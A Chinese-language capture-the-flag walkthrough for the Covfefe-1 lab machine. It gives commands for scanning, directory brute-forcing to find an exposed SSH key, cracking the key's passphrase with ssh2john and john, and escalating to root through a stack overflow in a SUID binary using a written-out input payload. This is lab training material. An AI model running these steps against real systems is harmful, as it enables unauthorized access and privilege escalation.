当前位置: 首页 > news >正文

Covfefe

news 2026/6/10 17:01:23

Covfefe-1 靶机渗透实战

环境说明

  • 攻击机:Kali Linux,IP:192.168.146.128
  • 靶机:Covfefe-1,IP:192.168.146.130
  • 网络模式:统一 NAT,同网段192.168.146.0/24

第一阶段:主机探测(确定靶机 IP)

先查看本机网卡与网段,再扫描全网段存活主机,定位靶机真实 IP。

ifconfig
arp-scan -l

确定目标靶机 IP:192.168.146.130

第二阶段:端口 & 服务扫描(挖掘对外开放服务)

nmap -p- -sV 192.168.146.130 -n -T4

扫描结果分析

  1. 22/tcp:OpenSSH 7.4p1 → SSH 远程登录端口;
  2. 80/tcp:Nginx 1.10.3 → 普通 Web 服务;
  3. 31337/tcp:Werkzeug (Python) Web 服务 →核心攻击入口

第三阶段:Web 目录爆破(寻找泄露路径)

思路

对两个 Web 端口分别做目录爆破,查找隐藏目录、敏感文件、配置文件泄露。

3.1 爆破 80 端口

dirb http://192.168.146.130:80

结果

无有效敏感目录,80 端口无利用价值。

3.2 爆破 31337 端口(重点)

dirb http://192.168.146.130:31337

爆破结果

发现高危泄露路径:/.ssh/taxes/.bashrc/robots.txt

  • /taxes:存放第一个 Flag;
  • /.ssh:SSH 密钥目录,包含私钥、公钥,是核心突破点。

第四阶段:Web 页面访问 & 敏感文件下载

思路

浏览器访问爆破出的敏感路径,获取 Flag、下载 SSH 密钥文件、确认登录用户名。

4.1 获取 Flag1

浏览器访问:http://192.168.146.130:31337/taxes/

4.2 访问 SSH 密钥目录

浏览器访问:http://192.168.146.130:31337/.ssh

4.3 下载文件 + 提取用户名

将 3 个文件下载到 Kali 桌面,查看公钥内容,确认登录用户为simon

第五阶段:破解加密 SSH 私钥

思路

id_rsa是加密私钥,无法直接登录;使用ssh2john提取哈希值,再用john工具暴力破解密码。

5.1 切换工作目录

cd /root/Desktop

5.2 查找 ssh2john 工具路径

locate ssh2john

5.3 提取私钥哈希

/usr/bin/ssh2john id_rsa > id_rsa.hash

5.4 John 爆破哈希密码

john id_rsa.hash

5.5 修正私钥权限(SSH 强制安全限制)

SSH 要求私钥权限必须为 600,否则拒绝连接。

chmod 600 id_rsa

第六阶段:SSH 低权限登录靶机

思路

使用破解后的私钥 + 密码,登录simon普通用户。

操作命令

ssh -i id_rsa simon@192.168.146.130
  1. 输入yes确认主机指纹;
  2. 输入私钥密码:starwars

登录结果

成功进入靶机,当前用户:simon(普通低权限用户)。

第七阶段:靶机内网信息搜集(寻找提权点)

思路

查看当前权限、系统目录、敏感文件、源码,寻找可提权的漏洞、高权限程序。

7.1 查看当前用户信息

whoami id ls

7.2 进入 /root 目录

cd /root ls

7.3 查看漏洞源码 read_message.c

cat read_message.c

源码分析 & 收获

  1. 函数gets()无输入长度限制,存在栈溢出高危漏洞
  2. 程序仅校验输入前 5 个字符必须为 Simon
  3. 获取 Flag2:flag2{use_the_source_luke}
  4. 直接读取flag.txt提示权限不足,必须提权。

第八阶段:查找 SUID 高权限程序(提权关键)

思路

SUID 权限程序可让普通用户以文件所有者(root)身份运行,是 Linux 经典提权方式。

操作命令

find / -perm -4000 2>/dev/null

关键发现

/usr/local/bin/read_message属于 root 用户且带有 SUID 权限,结合前面栈溢出漏洞,确定为提权目标

第九阶段:栈溢出漏洞利用(提权至 Root)

整体思路

运行带 SUID 的漏洞程序,构造特殊载荷:前5位=Simon(绕过校验) + 大量字符填充缓冲区(触发栈溢出) + /bin/sh(反弹Shell)

9.1 进入程序目录

cd /usr/local/bin ls

9.2 执行漏洞程序并输入载荷

./read_message

输入载荷:

SimonAAAAAAAAAAAAAAAAAAAA/bin/sh

9.3 验证 Root 权限

whoami id

9.4 读取最终 Flag

cat /root/flag.txt

十、渗透总结 & 知识点复盘

1. 完整攻击流程

主机探测 → 端口服务扫描 → Web 目录爆破 → 敏感文件泄露(SSH 密钥)→ 私钥爆破 → 低权限 SSH 登录 → 源码审计(发现栈溢出)→ 查找 SUID 程序 → 栈溢出提权 Root → 收集全部 Flag

2. 核心考点

  1. Web 目录泄露:错误配置导致.ssh密钥目录对外公开;
  2. SSH 加密私钥破解ssh2john + john组合工具使用;
  3. Linux 权限:SSH 私钥 600 权限要求、SUID 提权原理;
  4. 二进制漏洞gets()函数栈溢出、简单缓冲区溢出利用。
http://www.gsyq.cn/news/1399638.html

相关文章:

  • Rust宏编程实践:编译时代码生成技巧
  • AI代理系统调试优化:基于文件架构的极致可调试性实践
  • 学了PMP不知道做什么?日薪1W+的项目管理讲师可以考虑!
  • 02-认知篇-基础-AOT编译原理
  • 编程语言:Go语言并发编程实战
  • 【OpenCV零基础保姆级入门】一篇吃透计算机视觉预处理!全套实战代码,适配YOLO/深度学习
  • 别再被‘Could not open a connection to your authentication agent’卡住了!手把手教你启动SSH-Agent并添加密钥
  • 从调用链到关系图:多智能体系统故障建模与图算法分析实践
  • Python实现GPU温度精准监控:绕过系统层误差,直连硬件传感器
  • 别再死记硬背了!用Wireshark抓包实战,5分钟搞懂H264/H265的RTP打包与NALU结构
  • 大模型 B 端落地第一战场——财务 AI 的核心逻辑、落地方法与未来架构
  • 论三生原理:一部融贯数理星象的当代东方创世史诗?
  • 别再只盯着GNN了!用Python实战传统图特征:节点中心性、链接预测与图核方法
  • 大模型AI校招核心考点解析:从Transformer到工程实践,助你拿下Offer!
  • 2026年评价高的上海空气除菌过滤器/反冲洗过滤器/双联过滤器公司哪家好 - 行业平台推荐
  • Biomarker Res(IF=11.5)安徽医科大学第一医院:基于机器学习的放射组学模型:子宫内膜癌患者的预后预测及机制探索
  • OpenGL ES 4x MSAA实战:在Android/iOS上开启抗锯齿,性能开销真的像传说中那么小吗?
  • Cortex-M栈内存配置与地址获取实战指南
  • 山东交通设施哪家强?业内公认:山东伟通集团,全国 16 厂源头大厂
  • TwinCAT ADS通讯避坑指南:C#读写PLC结构体、数组时,字节对齐和类型映射那些事儿
  • AI智能体工程化:构建可靠智能系统的四大支柱与实战指南
  • 走进 GEO 新时代:详解中立监测平台搜极星的核心能力
  • 解读民法典自然人 民事权利能力和民事行为能力 第十五条
  • AI 技术在招投标文档编制中的应用与实践
  • 储能技术资料
  • 从日志到可观测性:开发者如何利用三大支柱定位分布式系统疑难问题
  • 从门店到全域,从赋能到增长:汇源集团如何搭建全域矩阵营销体系
  • 并发、并行与异步:核心概念辨析与工程实践指南
  • Keil C51链接错误L121解析与8051内存优化
  • 2026年口碑好的贵州冠晶石/贵州雅晶石/贵州水包砂优质供应商推荐 - 行业平台推荐